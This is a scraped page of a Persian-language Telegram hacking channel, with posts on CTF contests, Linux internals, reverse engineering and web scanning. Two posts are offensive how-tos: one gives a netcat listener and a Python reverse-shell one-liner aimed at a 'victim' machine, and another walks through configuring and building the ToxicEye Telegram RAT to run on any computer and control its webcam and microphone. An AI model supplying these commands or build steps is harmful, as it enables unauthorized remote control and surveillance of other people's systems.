Cyber Souls


Гео и язык канала: Иран, Фарси
Категория: Технологии


❕Official Channel of CyberSouls Team
❕A hacker is a programmer, but a programmer may not be a hacker.
❗️Admims: t.me/CyberSoulsAdmins
❗️Discussion GP: @CyberSoulzGP
❗️Donate: https://u.cybersouls.tk/3

Связанные каналы

Гео и язык канала
Иран, Фарси
Категория
Технологии
Статистика
Фильтр публикаций


Видео недоступно для предпросмотра
Смотреть в Telegram
#ReverseShell
مثال از ReverseShell
❕ترمینال پایینی، شبیه ساز سیستم خودم
❕ترمینال بالایی، شبیه ساز سیستم قربانی

❗️بعد از وصل شدن، مهاجم میتونه دستورای مورد نظرشو به راحتی توی سیستم قربانی اجرا کنه.

[پستای قبلی #ReverseShell رو هم نگاه کنید]

❗ فرمت فیلم درست شد.
@CyberSoulz


نمونه اجرا 👇


#CTF
امشب ساعت ۱۲:۳۰ این مسابقه شروع میشه، اسپانسر های نسبتا خوبی هم داره،‌ بریم ببینیم چی میشه ✌🏽

اگه میخواید میتونید از لینک زیر ثبت نام کنید:‌
https://ctf.dicega.ng/

@CyberSoulz


#FYI
اینترنت کره‌شمالی در نتیجه یک حمله سایبری قطع شد.
جالبه بدونید که این حمله سایبری توسط یه شخص انجام شده نه یک تیم سایبری دولتی
ظاهرا هکر (با اسم مستعار P4x). ،قبلا توسط هکرهای دولتی کره‌شمالی آسیب دیده بوده و هک شده و بعد از اینکه از ایالات‌متحده برای پاسخ به حملات سایبری کره‌شمالی ناامید میشه ،تصمیم میگیره خودش اقدام کنه با راه اندازی وبسایت در تور و استخدام هکرهای دیگه دست به این حمله میزنن
منبع خبر رو بی اطلاع هستم ولی جالب بود

https://www.wired.com/story/north-korea-hacker-internet-outage/

https://www.dailymail.co.uk/news/article-10473271/US-hacker-pyjamas-takes-North-Koreas-internet.html

@CyberSoulz


#ReverseShell
بیشتر از چیزی که فکر کنید این روش آسونه ...
ولی پیدا کردن سیستمی که بتونید این تکنیک رو روش پیدا کنید خیلی راحت نیست.

❗️برای پیاده سازی این تکنیک باید ابتدا یک listener توی سیستم خودمون ایجاد کنیم:
با استفاده از دستور nc میتونیم روی یک port خاص اینکار رو بکنیم:
nc -lp 1337

❗️حالا نیاز داریم تا قربانی به ما وصل بشه، برای این کار باید یه تیکه کد توی سیستم طرف بتونیم اجرا کنیم که تقریبا به تموم زبان های برنامه نویسی میتونیم این کار رو بکنیم، من با python این کار رو میکنم:
فقط دقت کنید که به جای 127.0.0.1 باید ip خودتون رو بزنید.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

❗️و تمام .
❕الان قربانی به شما وصل شده و شما میتونید هر دستوری رو روی سیستمش اجرا کنید.

🔜 معرفی چند ابزار برای ساختن Revershell به زبان های مختلف
@CyberSoulz


#ReverseShell
یکی از مهم ترین تکنیک های هک سرور ها Reverse Shell هست.

❕تو این تکنیک مهاجم تلاش میکنه تا با ترفند های مختلف بتونه دسترسی shell پیدا کنه و با این دسترسی میتونه سطح دسترسی خودشو بالا ببره و کنترل کامل سیستم رو به دست بگیره.
❗️ و در حالی که بیشتر سیستم ها پشت firewall قرار دارند و تقریبا پیدا کردن دسترسی از راه دور به shell غیرممکنه یکی از روش هایی که برای دور زدن این محدودیت ها استفاده میشه Reverse Shell هست

چجوری انجام میشه؟
به جای اینکه ما به سیستم قربانی وصل بشیم و دستوراتی که میخوایم رو اجرا کنیم، ما یک listener توی سیستم خودمون میسازیم و کاری میکنیم که سیستم قربانی به سیستم ما وصل بشه و اون موقع ما دستوراتی که میخوایم رو میتونیم توی سیستمش اجرا کنیم.
و چون سیستم قربانی خودش به ما وصل شده پس چیزی وجود نداره که فایروال جلوشو بگیره :)

🔜 بیشتر از چیزی که فکر کنید این روش آسونه ...
@CyberSoulz


#Linux

I/O (input/output) addressing
یا I/O ports آدرس های منحصربفردی داخل مموری براشون رزرو شده برای ارتباط برقرار کردن بین device های خاص و CPU .
پس interrupt یه massage رو از طریق I/O ports صدا میزنه.
داخل فایل proc/ioports/ میتونید آدرس های hardware memory رو ببینید مثلا در عکس بالا آدرس 0060 و 0064 برای keyboard استفاده میشه

@CyberSoulz


حماسه ای دیگر از دوستان ایرانی شمام اگه دوس داشتید برید vote بدید 🙂

https://m.imdb.com/title/tt7657124/?ref_=ext_shr_lnk


#Linux

اولین فایلی که داخل lpic-1 نشون میده و میخواد ما داخلشو ببینیم فایل proc/interrupts/ هست
که نشون میده پروسس ها چندبار از CPU قطع و وصل شدن و چیزایی رو مثل timer و keyboard رو نشون میده
مثلا از داخل این عکس میتونید ببینید که تعداد CPU هام رو نوشته و از سمت چپ عدد پروسس و تعداد باری که تو اون هسته CPU اتفاق افتاده و اسمشو نوشته
الان اونی که عددش ۱۶ هست keyboard ام هست که میتونید ببینید چند بار interrupt شده

@CyberSoulz


#Malware #ToxicEye

❗️با این برنامه شما میتونید یک ویندوز رو از راه دور توسط یک بات تلگرام کنترل کنید.
- مشخصات کامپیوتر رو ببینید
- از ویکروفون یا وبکمش استفاده کنید
- یک برنامه خاص برو ببندید یا باز کنید
- میتونید CD ROM رو باز یا بسته کنید
- و
...

برای استفاده:
❕باید از @BotFather یک بات برای خودتون بسازید و token و اسم اون رو یکجا ذخیره کنید.
❕حالا شما نیاز به یک chat id دارید، با استفاده از @chatid_echo_bot میتونید chat id خودتون رو بگیرید و ذخیره کنید.
❕حالا باید Visual Studio و همچین source code های ToxicEye رو دانلود کنید.
❕کد ها رو unzip کنید، فایل TelegramRAT.sln رو توسط Visual Studio باز کنید و فایل config.cs رو باز کنید.
حالا token و chat id ای که قبلا به دست آوردین رو جایگذاری کنید.
گزینه ی Release رو انتخاب کنید، فایل رو save کنید (CTRL+S) و با (CTRL+B) از پروژه یک build بگیرید.

الان شما میتونید خروجی رو روی هر کامپیوتری که میخواید اجرا کنید و توسط Bot اون کامپیوتر رو کنترل کنید.

SourceCode
ساخت بات
مقدار chat id
نصب Visual Studio
ُفایل کانفیگ
آدرس خروجی بعد از ‌build

@CyberSoulz


خب دوستان آموزش لینوکس رو براتون چطوری بزارم ؟
Опрос
  •   از رو lpic و به صورت کاملا تخصصی
  •   ساده و فقط برای استفاده روزانه
  •   فقط نکات و چیزای کاربردی و یا تخصصی
140 голосов


#CTF #dirb
معرفی: dirb یک اسکنر محتوای وب هست که از تکنیک brute force استفاده میکنه.

❕به طور کلی یک هدف براش مشخص میکنیم،‌ مثلا سایت example.com و dirb با استفاده از http request های متوالی و wordlist پیشفرضش تلاش میکنه دایرکتوری ها و فایل های موجود رو پیدا کنه.

❗️معمولا وقتی یه سایت رو میخوایم تست کنیم، یکی از اولین نیاز هامون اینه که بدونیم این سایت چه صفحاتی داره و با استفاده از این ابزار به راحتی میتونیم بیشتره صفحات موجود رو پیدا کنیم و روی تک تکشون بررسی هامون رو انجام بدیم

❗️توی محیط ترمینال به صورت ساده با دستور زیر اجرا میشه:
dirb https://example.com -r -o output.txt
که خروجی رو برامون توی فایل output.txt ذخیره میکنه.

Kali Refrence

@CyberSoulz


4_6012308186894174942.pdf
780.9Кб
#reversing
یه مقاله خوب راجب stack و memory هست که داخلش راجب polymorphism shell code
هم توضیح داده
راجب ابزار modular multi-layer ciphering
هم توضیح داده که خیلی داخل polymorphism shell code
بدرد میخوره امیدوارم لذت ببرید

@CyberSoulz


#CTF
اینم از پایان این مسابقه، رتبمون شد 315 از 800 تا تیم

سوالاش خیلی سخت نبود ولی تعدادش خیلی زیاد بود و چون تقریبا تنها بودم، تنهایی وقت کم آوردم ...

سعی میکنم خلاصه ی مسابقه رو یه کلیپ کوتاه بگیرم
فعلا گود لاک ✌🏽
@CyberSoulz


#Linux Config

شما میتونید لینوکستون رو خیلی حرفه ای مثل عکس های بالا درست کنید.
برای این کار باید کانفیگ های مربوط به هر قسمتی که میخواید رو خودتون customize کنید، بیشتر کانفیگ های برنامه ها داخل دایرکتوری
~/.config
وجود داره و ممکنه خیلی از اون ها هم داخل دایرکتوری home به صورت هیدن باشن، مثل:
~/.zshrc
و اگر کانفیگ برنامه مورد نظرتون رو داخل این ۲ آدرس پیدا نکردید باید doc خود برنامه رو بخونید که آدرس کانفیگش رو پیدا کنید.

@CyberSoulz


Knight #CTF

❕خوب یه CTF پیدا کردم برای آخر هفته 🙂
CTF Start Time 20 January 2022 09:00PM GMT +6
CTF End Time 21 January 2022 09:00PM GMT +6


❗️اگر شرکت میکنید، اسم تیمتون رو توی گروه بگید که آمار بیاد دستمون :)
❗️اگرم دوست دارید شرکت کنید و نمیدونید باید از کجا شروع کنید،‌بازم تو گروه بگید که بتونیم کمکتون کنیم ✌🏽

@CyberSoulz


#FYI
آیا میدونستید #Flask به عنوان یه شوخیه April Fools شروع شده 🙂
ّInitial release: April 1, 2010

📌 How an April Fools’ Joke became a Framework with Good Intentions

@CyberSoulz


ELF - Fake Instructions.pdf
808.4Кб
#Reversing #R2
این هم write up که گفته بودم امیدوارم خوشتون بیاد سوالی داشتید بپرسید

@CyberSoulz


#Reversing #R2 #Assembly

❗️فردا میخوام یک writeup از reversing بزارم به خاطر همین قبلش یه توضیح کوچیکی میدم که آشنایی پیدا کنید

خوب Reversing برای کرک کردن برنامه ها استفاده میشه، یعنی شما میتونید حتی ساختار برنامه رو تغییر بدید و یا چیزهایی که در memory و stack میره ویا دریافت میکنه رو عوض کنید و میتونید تا حدی data های خود برنامه رو بخونید.

❕برای اینکه بتونیم خوب reversing رو درک کنیم باید یک سری چیز ها رو قبلش بخونیم و با قضیه تا حدی آشنا شیم، مثل:
▪️یک سری مفاهیم مثل memory - heap - stack overflow - hex - binary و ...
▪️اون زبانیم که داریم reverse میکنیم رو باید حداقل بلد باشیم بخونیم که معمولا زبان c و c++ هست و همچنین یکم دانش python برای نوشتن script ها
▪️زبان assembly هم باید بتونیم درک کنیم و اینکه با کامپایلرها هم آشنایی داشته باشیم

❕ من دوتا pdf براتون میفرستم برای reversing و assembly که خوب توضیح داده

❕ابزارایی هم که خودم میخوام استفاده کنم r2 و winedbg هست

Reversing doc

Assembly doc

@CyberSoulz


من این چند وقته درگیر مصاحبه شرکتای مختلف بودم
یه چند روز باید از پست های ادمین عزیزمون Arian استفاده کنیم :)

Показано 20 последних публикаций.

895

подписчиков
Статистика канала